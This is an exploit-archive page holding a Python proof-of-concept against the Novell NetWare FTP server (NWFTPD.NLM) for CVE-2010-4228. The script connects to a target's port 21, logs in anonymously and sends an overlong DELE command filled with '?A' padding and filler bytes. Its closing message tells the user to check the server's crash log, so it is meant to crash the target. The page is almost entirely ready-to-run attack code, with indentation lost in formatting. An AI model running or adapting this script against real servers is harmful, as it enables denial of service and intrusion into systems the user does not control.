ExploitFixes
Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability - [CVE: 2010-4228] 2011-03-21 17:15:05

#!/usr/bin/python

import socket, sys

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25

host = (sys.argv[1])
data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47\x48\x48\x44\x43\x42\x41\x0d\x0a"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((host, 21))
d=s.recv(1024)
print (d)
s.send("USER toto\r\n") #anonymous login so anything goes
d=s.recv(1024)
print (d)
s.send("PASS toto\r\n")
d=s.recv(1024)
print (d)
s.send(data)
d=s.recv(1024)
print (d)
s.close()

try:
s.connect((host,21))
except:
print ("\r\n[i] Beep Beep, take a look to your Abend log file.")
except:
print ("[i] Error")